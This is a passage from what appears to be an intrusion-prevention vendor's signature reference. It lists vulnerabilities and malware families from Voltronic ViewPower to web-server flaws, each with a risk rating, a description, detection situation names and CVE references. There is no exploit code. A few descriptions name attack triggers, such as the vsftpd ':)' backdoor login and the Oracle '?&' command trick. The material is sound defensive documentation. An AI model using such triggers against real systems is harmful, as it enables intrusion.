
Platform:

Windows; Linux; Mac OS

Software:

Voltronic Power ViewPower Pro

Type:

Insecure Configuration

Description:

A vulnerability in Voltronic ViewPower Pro, versions Pro V2.0-20363 and V.HTML 1.04-21344, which allows remote attackers to change passwords without authentication by sending RMI requests to the target server, due to the method updateManagerPassword being exposed in it's RMI service.

Situation:

Generic_CS-Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass

References:

CVE-2023-51573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51573

Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Voltronic Power ViewPower Pro

Risk:

High

First detected in:

sgpkg-ips-1678-5242

Last changed:

sgpkg-ips-1678-5242

Platform:

Generic

Software:

Voltronic Power ViewPower Pro

Type:

Input Validation

Description:

An unrestricted file upload vulnerability has been reported in Voltronic ViewPower Pro. The vulnerability is due to improper validation of file types uploaded to the target server. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of LOCAL SERVICE.

Situation:

HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload
HTTP_CS-Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload-2

References:

CVE-2023-51590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51590

VSFTPD-Backdoor-Command-Execution

About this vulnerability:

A VSFTPD Backdoor Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VSFTPD

Type:

Backdoor

Description:

A backdoor was introduced into the vsftpd-2.3.4.tar.gz download archive between June 30th 2011 and July 1st 2011, which gives remote users the ability to login by using a :) in the USER parameter. More information can be found here http://scarybeastsecurity.blogspot.fi/2011/07/alert-vsftpd-download-backdoored.html.

Situation:

FTP_CS-VSFTPD-Backdoor-Command-Execution

References:

OSVDB-73573
http://www.osvdb.org/73573

Vtiger-CRM-Authenticated-Remote-Code-Execution

About this vulnerability:

A vulnerability in vTiger CRM 5.3.0/5.4.0

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vTiger CRM

Type:

PHP Injection

Description:

An authenticated user can upload malicious php code to vTiger CRM and execute it remotely.

Situation:

HTTP_CS-Vtiger-CRM-Authenticated-Remote-Code-Execution

References:

CVE-2013-3591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3591

Vtiger-CRM-PHP-Code-Injection

About this vulnerability:

A Vtiger CRM PHP Code Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

vTiger CRM

Type:

PHP Injection

Description:

A vulnerability in vTiger CRM, versions 5.4.0 and before, which allows remote attackers to inject and execute arbitrary PHP code.

Situation:

File-TextId_Vtiger-CRM-PHP-Code-Injection

References:

CVE-2013-3214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3214

BID-61558
http://www.securityfocus.com/bid/61558

OSVDB-95902
http://www.osvdb.org/95902

Vtiger-Install-Module-Remote-Command-Execution

About this vulnerability:

A Vtiger Install Module Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-697-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

vTiger CRM

Type:

Insecure Configuration

Description:

A remote command execution vulnerability in vTiger, version 6.0 before security patch 2, which allows remote attackers to re-install the application with a request that sets the X-Requested-With HTTP header.

Situation:

HTTP_CS-Vtiger-Install-Module-Remote-Command-Execution

References:

CVE-2014-2268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2268

BID-66757
http://www.securityfocus.com/bid/66757

Vundo

About this vulnerability:	Vundo
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Vundo is a Bot that can download additional malicious content on the infected machine.
Situation:	HTTP_CSU-Vundo-Traffic HTTP_SLS-Vundo-Traffic

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12255

About this vulnerability:

A vulnerability in VxWorks

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VxWorks

Type:

Buffer Overflow

Description:

There exists several memory corruption vulnerabilities in the VxWorks TCP/IP stack related to the handling of the Urgent Pointer field. The Forcepoint NGFW automatically strips out the Urgent flag from all TCP segments if present, in addition to any data in the Urgent Pointer field. This means that the Forcepoint NGFW automatically protects against these vulnerabilities.

References:

CVE-2019-12255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12255

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12260

About this vulnerability:

A vulnerability in VxWorks

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VxWorks

Type:

Buffer Overflow

Description:

References:

CVE-2019-12260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12260

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12261

About this vulnerability:

A vulnerability in VxWorks

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VxWorks

Type:

Buffer Overflow

Description:

References:

CVE-2019-12261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12261

VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12263

About this vulnerability:

A vulnerability in VxWorks

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VxWorks

Type:

Buffer Overflow

Description:

References:

CVE-2019-12263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12263

VxWorks-Stack-Overflow-Vulnerability-CVE-2019-12256

About this vulnerability:

A vulnerability in VxWorks

Risk:

High

First detected in:

sgpkg-ips-1181-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VxWorks

Type:

Buffer Overflow

Description:

There exists a stack overflow vulnerability in the Wind River VxWorks. The vulnerability is in the processing of Loose Source Route and Strict Source Route options. When packets containing these options are seen, the NGFW will produce the situations "IP Option Loose Source Route" and "IP Option Strict Source Route". To prevent the usage of these options, these situations can be set to terminate in the inspection policy.

Situation:

IP Option Loose Source Route
IP Option Strict Source Route

References:

CVE-2019-12256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12256

W2B-Online-Banking-SQL-Injection-Vulnerability

About this vulnerability:

SQL injection vulnerability in W2B Banking

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

W2B Online Banking

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in W2B Online Banking. The software fails to sanitize the user-supplied data which allows injection of SQL commands.

Situation:

HTTP_CRL-Possible-W2B-Banking-SQL-Injection

References:

CVE-2007-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3175

OSVDB-37466
http://www.osvdb.org/37466

OSVDB-37467
http://www.osvdb.org/37467

W32-Jorik-Sefnit

About this vulnerability:	W32.Jorik/Sefnit
Risk:	Moderate
First detected in:	sgpkg-ips-612-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Traffic possibly related to W32.Jorik/Sefnit
Situation:	HTTP_CSU-W32-Jorik-Sefnit-2 HTTP_CSU-W32-Jorik-Sefnit

W32/Brepibot.gen-Malware

About this vulnerability:	W32/Brepibot.gen malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Brepibot.gen is a Windows malware that can be remotely controlled via IRC.
Situation:	Generic_CS-W32/Brepibot.gen-Activity

W32/Gaobot.worm.gen-Worm-IRC-Activity

About this vulnerability:	Botnet IRC Activity
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Gaobot.worm is a network worm. It also has a botnet capablities. There other botnet-enabled worms that may generate similar IRC traffic, such as W32/Sdbot.worm or UrxBot.
Situation:	Generic_SS-W32/Gaobot.worm.gen-Worm-IRC-Activity

W32/Gaobot.worm.gen.by-Malware

About this vulnerability:	W32/gaobot.worm.gen.by malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Gaobot.worm is a Windows malware that can be remote controlled over IRC.
Situation:	Generic_CS-W32/Gaobot.worm.gen.by-Activity

W32/Gaobot.worm.gen.d-Malware

About this vulnerability:	W32/Gaobot.worm.gen.d malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Gaobot.worm.gen.d is a Windows malware that can be remotely controlled via IRC.
Situation:	Generic_CS-W32/Gaobot.worm.gen.d-Activity

W32/Gaobot.worm.gen.e-Malware

About this vulnerability:	W32/gaobot.worm.gen.e malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Gaobot.worm.gen.e is a Windows malware that can be controlled over IRC.
Situation:	Generic_CS-W32/Gaobot.worm.gen.e-Activity

W32/Gaobot.worm.gen.j-Malware

About this vulnerability:	w32/gaobot.worm.gen.j malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Gaobot.worm.gen.j is a Windows malware that can be remotely controlled over IRC.
Situation:	Generic_CS-W32/Gaobot.worm.gen.j-Activity

W32/Ircbot.gen-Malware

About this vulnerability:	W32/Ircbot.gen malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Ircbot.gen is a Windows malware that can be controlled over IRC.
Situation:	Generic_CS-W32/Ircbot.gen-Connect

W32/Ircbot.worm!ms05-039-Malware

About this vulnerability:	W32/Ircbot.worm!ms05-039 malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Ircbot.worm!ms05-039 is a Windows malware that can be remote controlled via IRC.
Situation:	Generic_CS-W32/Ircbot.worm!ms05-039-Activity

W32/Ircbot.worm.gen-Malware

About this vulnerability:	W32/ircbot.worm.gen malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Ircbot.worm is a Windows malware that can be remote controlled via IRC.
Situation:	Generic_CS-W32/Ircbot.worm.gen-Activity

W32/Mydoom.bg@mm-Malware

About this vulnerability:	W32/Mydoom.bg@mm malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Mydoom.bg@mm is a mass-mailing Windows malware that can be remote controlled over IRC.
Situation:	Generic_CS-W32/Mydoom.bg@mm-Activity

W32/Mydoom@MM

About this vulnerability:	W32/Mydoom@MM
Risk:	Low
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	Mydoom@MM is a mass-mailing and peer-to-peer file-sharing worm that can cause Denial of Service.

W32/Mytob.gen@mm-Malware

About this vulnerability:	W32/Mytob.gen@mm malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Mytop.gen@mm is a mass-mailing Windows malware that can be controlled over IRC.
Situation:	Generic_CS-W32/Mytob.gen@mm-Activity

W32/MyWife.d@MM!M24-Malware

About this vulnerability:	W32/MyWife.d@MM!M24 malware
Risk:	High
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/MyWife.d@MM!M24 is a worm that spreads through e-mail.
Situation:	HTTP_CSU-W32/MyWife.d@MM!M24-Activity

W32/Nuwar@mm-Malware

About this vulnerability:	W32/Nuwar@MM Encrypted Traffic
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Nuwar@MM is a mass-mailing Windows worm. It also has a botnet capablity.
Situation:	Generic_CS-W32/Nuwar@mm-Encrypted-Traffic Generic_SS-W32/Nuwar@mm-Encrypted-Traffic Generic_UDP-W32/Nuwar@mm-Encrypted-Traffic Datalength-UDP_W32/Nuwar@mm-Encrypted-Traffic Datalength-TCP_W32/Nuwar@mm-Encrypted-Traffic

W32/Oscarbot-Malware

About this vulnerability:	W32/Oscarbot malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Oscarbot is a Windows malware that can be remotely controlled over IRC.
Situation:	Generic_CS-W32/Oscarbot-Activity

W32/Poebot.dam-Malware

About this vulnerability:	W32/Poebot.dam malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Powbot.dam is a Windows malware that can be controlled over IRC.
Situation:	Generic_CS-W32/Poebot.dam-Activity

W32/Poebot.gen-Malware

About this vulnerability:	W32/Poebot.gen malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Poebot.gen is a Windows malware that can be remotely controlled over IRC.
Situation:	Generic_CS-W32/Poebot.gen-Activity

W32/Polybot.dr-Activity

About this vulnerability:	w32/Polybot.dr activity
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Polybot.dr is a Windows malware that can be controlled over IRC.
Situation:	Generic_CS-W32/Polybot.dr-Activity

W32/Polybot.gen!irc-Malware

About this vulnerability:	W32/Polybot.gen!irc malware
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Polybot.gen!irc is a bot that can be controlled via IRC.
Situation:	Generic_CS-W32/Polybot.gen!irc-Activity

W32/Polybot@mm-Malware

About this vulnerability:	W32/Polybot@mm malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Polybot@mm is a mass-mailing Windows worm that can be controlled over IRC.
Situation:	Generic_CS-W32/Polybot@mm-Activity HTTP_CS-W32/Polybot@mm-Activity

W32/Sdbot.g.gen-Malware

About this vulnerability:	W32/Sdbot.g.gen malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Sdbot.g.gen is a Windows malware that can be controlled over IRC.
Situation:	Generic_CS-W32/Sdbot.g.gen-Activity

W32/Sdbot.worm.gen-Malware

About this vulnerability:	W32/Sdbot.worm.gen malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Sdbot.worm.gen is a Windows worm that can be remotely controlled over IRC.
Situation:	Generic_CS-W32/Sdbot.worm.gen-Activity-2 Generic_CS-W32/Sdbot.worm.gen-Activity Generic_SS-W32/Sdbot.worm.gen-Activity HTTP_CS-W32/Sdbot.worm.gen-Activity

W32/Sdbot.worm.gen.bj-Malware

About this vulnerability:	W32/Sdbot.worm.gen.bj malware
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Sdbot.worm.gen.bj is a Sdbot variant that can be controlled over IRC.
Situation:	Generic_CS-W32/Sdbot.worm.gen.bj-Activity Generic_CS-W32/Spybot.worm.gen.bj-Connect Generic_SS-W32/Sdbot.worm.gen.bj-Activity

W32/Sdbot.worm.gen.by-Malware

About this vulnerability:	W32/Sdbot.worm.gen.by malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Sdbot.worm is an IRC-controlled botnet.
Situation:	Generic_CS-W32/Sdbot.worm.gen.by-Activity Generic_SS-W32/Sdbot.worm.gen.by-Activity

W32/Spybot.worm.gen.e-Malware

About this vulnerability:	W32/Spybot.worm.gen.e malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Spybot.worm.gen.e is a Windows worm that can be remotely controlled over IRC.
Situation:	Generic_CS-W32/Spybot.worm.gen.e-Activity

W32/Spybot.worm.gen.f-Malware

About this vulnerability:	W32/Spybot.worm.gen.f malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Spybot.wom.gen.f is a Windows malware that can be remotely controlled over IRC.
Situation:	Generic_CS-W32/Spybot.worm.gen.f-Activity

W32/Spybot.worm.gen.o-Malware

About this vulnerability:	W32/spybot.worm.gen.o malware
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	W32/Spybot.worm.gen.o is a Windows malware that can be controlled over IRC.
Situation:	Generic_CS-W32/Spybot.worm.gen.o-Activity

W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow

About this vulnerability:

A stack based buffer overflow vulnerability in W3C Amaya Web Browser.

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

W3C Amaya

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in W3C Amaya Web Browser 10.0 and 11.0 which allows remote attackers to execute arbitrary code via a long type parameter in an input tag.

Situation:

File-Text_W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow

References:

CVE-2009-0323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0323

BID-33047
http://www.securityfocus.com/bid/33047

OSVDB-55721
http://www.osvdb.org/55721

Waledac-Bot

About this vulnerability:	Waledac Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Waledac is a Botnet mostly used for sending e-mail spam.
Situation:	HTTP_CSU-Waledac-Bot-Traffic HTTP_CSH-Waledac-Bot-Traffic

Waledac-Spambot

About this vulnerability:	Waledac spambot is a template-based spamming engine
Risk:	High
First detected in:	sgpkg-ips-269-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Waledac spambot
Type:	Backdoor
Description:	Waledac spambot is a template-based spamming engine. The Waledac botnet is acknowledged to be the successor to the Storm botnet.
Situation:	HTTP_CRL-Waledac-Spambot

WAMP-Webmail-No-Url-File-Inclusion

About this vulnerability:

File inclusion vulnerability in WAMP Webmail

Risk:

High

First detected in:

sgpkg-ips-199-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WAMP Webmail

Type:

Input Validation

Description:

There is a file inclusion vulnerability in the WAMP Webmail software written in the PHP scripting language. The software does not validate parameters for the yesno.phtml script correctly, allowing inclusion and execution of arbitrary PHP code in the context of the web server process.

Situation:

HTTP_CRL-WAMP-Webmail-No-Url-File-Inclusion

References:

CVE-2006-5147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5147

BID-20289
http://www.securityfocus.com/bid/20289

OSVDB-33916
http://www.osvdb.org/33916

Wannacry-Ransomware

About this vulnerability:	A transfer of WannaCry ransomware detected
Risk:	High
First detected in:	sgpkg-ips-1860-5242
Last changed:	sgpkg-ips-1860-5242
Platform:	Generic
Software:	WannaCry
Type:	Backdoor
Description:	WannaCry ransomware executable.
Situation:	File-Exe_Wannacry-Ransomware

War-Ftpd-User-Pass-BOF

About this vulnerability:

Buffer overflow in War FTPD

Risk:

Moderate

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

War FTP Daemon

Type:

Buffer Overflow

Description:

WarFTPD is vulnerable to a buffer overflow in the USER and PASS command handling. A remote attacker can overflow a buffer and execute arbitrary commands on the server.

Situation:

FTP_CS-War-Ftpd-User-Pass-BOF
FTP_CS-War-Ftpd-User-Pass-BOF-2

References:

CVE-1999-0256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0256

BID-10078
http://www.securityfocus.com/bid/10078

OSVDB-875
http://www.osvdb.org/875

Watchguard-Pre-Auth-RCE-CVE-2022-26318

About this vulnerability:

A vulnerability in Watchguard

Risk:

Moderate

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

Watchguard

Type:

Input Validation

Description:

Improper input validation causes a remote code execution vulnerability in Watchguard.

Situation:

HTTP_CRL-Watchguard-Pre-Auth-RCE-CVE-2022-26318

References:

CVE-2022-26318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26318

Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Wavelink Emulation License Server

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wavelink Emulation License Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Wavelink Emulation License Server. The vulnerability is due to a boundary error when parsing HTTP headers. By sending crafted requests to a vulnerable server, a remote unauthenticated attacker can possibly exploit this vulnerability to execute arbitrary code in the security context of the System user.

Situation:

HTTP_CRL-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
HTTP_CSH-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow

References:

CVE-2015-4059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4059

Wavlink-WN535K2-WN535K3-OS-Command-Injection

About this vulnerability:

A vulnerability in WAVLINK

Risk:

High

First detected in:

sgpkg-ips-1529-5242

Last changed:

sgpkg-ips-1529-5242

Platform:

Generic

Software:

WAVLINK

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the WAVLINK WN535K2 and WN535K3 wireless router devices. An unauthenticated remote attacker can use this vulnerability to execute arbitrary OS commands.

Situation:

HTTP_CSU-Wavlink-WN535K2-WN535K3-OS-Command-Injection

References:

CVE-2022-2488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488

Wayboard-Cgi-Directory-Traversal

About this vulnerability:

Way-board CGI directory traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Way-Board

Type:

Directory Traversal

Description:

The Way-board CGI script can be exploited using a directory traversal attack. The attacker may read any known file on the system with the web server privileges.

Situation:

HTTP_CSU-Wayboard-Cgi-Directory-Traversal

References:

CVE-2001-0214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0214

BID-2370
http://www.securityfocus.com/bid/2370

Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016

About this vulnerability:

A vulnerability in Wazuh

Risk:

Moderate

First detected in:

sgpkg-ips-1852-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

Wazuh

Type:

Input Validation

Description:

Improper input validation in the as_wazuh_object function causes an insecure object deserialization vulnerability in Wazuh. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016

References:

CVE-2025-24016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24016

Wazuh-Wazuh-Host-Deny-Command-Injection

About this vulnerability:

A vulnerability in Wazuh Wazuh

Risk:

Moderate

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

Wazuh

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Wazuh. The vulnerability is due to improper input validation when running the host-deny active response command. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploitation could result in command execution on the server or agent hosts.

Situation:

HTTP_CRL-Wazuh-Wazuh-Host-Deny-Command-Injection

References:

CVE-2023-50260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50260

WD-My-Cloud-NAS-Command-Injection-Vulnerability

About this vulnerability:	A vulnerability in WD My Cloud NAS
Risk:	Moderate
First detected in:	sgpkg-ips-687-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WD My Cloud NAS
Type:	Input Validation
Description:	There exists a command injection vulnerability in WD My Cloud NAS. A successful exploit can lead to remote code execution.
Situation:	HTTP_CRL-WD-My-Cloud-NAS-Command-Injection-Vulnerability

Weak-Diffie-Hellman-Parameters

About this vulnerability:

Weak Diffie-Hellman parameters

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Configuration Error

Description:

TLS connections with weak Diffie-Hellman parameters (too short prime) can allow passive eavesdropping. CVE-2015-4000 is also known as the "Logjam" issue.

Situation:

TLS_Export-Ciphersuite
TLS_Export-Ciphersuite
HTTPS_SS-Short-Diffie-Hellman-Prime
HTTPS_SS-Very-Short-Diffie-Hellman-Prime

References:

CVE-2015-4000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000

BID-74733
http://www.securityfocus.com/bid/74733

Web-Content-Scanner-Activity

About this vulnerability:	Web-content scanner activity detected
Risk:	High
First detected in:	sgpkg-ips-1274-5242
Last changed:	sgpkg-ips-1759-5242
Platform:	Generic
Software:	<os>
Type:	Vulnerability Scanner
Description:	One of the primary steps in attacking a web application is enumerating hidden URLs, directories and files within the application. This detects the activities of web scanners, such as gobuster, ffuf, and feroxbuster.
Situation:	HTTP_CRH-Web-Content-Scanner-Activity

Web-Dorado-Ecommerce-WD-SQL-Injection

About this vulnerability:

A Web-Dorado ECommerce WD SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Web-Dorado ECommerce WD

Type:

SQL Injection

Description:

A vulnerability in Web-Dorado ECommerce WD, version 1.2.5, which allows remote attackers to execute arbitrary SQL commands via the search_category_id, sort_order, and filter_manufacturer_ids in a displayproducts action to index.php.

Situation:

HTTP_CRL-Web-Dorado-Ecommerce-WD-SQL-Injection

References:

CVE-2015-2562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2562

Web-FrontPage-Rad-Reg-DLL-BOF

About this vulnerability:

FrontPage Server Extension RAD sub-component buffer overflow

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows 2000

Software:

FrontPage Server Extensions; IIS 4.0; IIS 5.0

Type:

Buffer Overflow

Description:

Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions contains a buffer overflow vulnerability in fp30reg.dll. A remote attacker can execute arbitrary commands via a specially crafted registration request (URL) to the fp30reg.dll.

Situation:

HTTP_CSU-FrontPage-Rad-Fp30reg-Access

References:

CVE-2001-0341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0341

BID-2906
http://www.securityfocus.com/bid/2906

OSVDB-577
http://www.osvdb.org/577

MS01-035
http://technet.microsoft.com/security/bulletin/MS01-035

Web-Oracle-Batch-File-Cmd-Exec

About this vulnerability:

Command execution using Oracle's batch files

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1638-5242

Platform:

Windows NT 4.0

Software:

Oracle Web Listener

Type:

Malfunction

Description:

Oracle Web Listener uses batch files that are stored in the /ows-bin/ directory by default. An attacker can run arbitrary commands on the server using these batch files by appending '?&' to the batch file name, followed by a command. The UNC paths can also be used to download and execute remote code. Executed programs will be run with the SYSTEM privileges.

Situation:

HTTP_CSU-Remote-Code-Execution-Via-Cgi-Batch-Arguments

References:

CVE-2000-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0169

BID-1053
http://www.securityfocus.com/bid/1053

Web-Server-PHP-Injection

About this vulnerability:	A PHP injection vulnerability in web server services
Risk:	High
First detected in:	sgpkg-ips-1151-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP server
Type:	PHP Injection
Description:	A PHP injection vulnerability in web server services which allows remote attackers to execute arbitrary code on the target system.
Situation:	HTTP_CRL-Web-Server-PHP-Injection

Web-Server-Side-Script-Disclosure

About this vulnerability:	A configuration error in the web server
Risk:	Low
First detected in:	sgpkg-ips-125-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
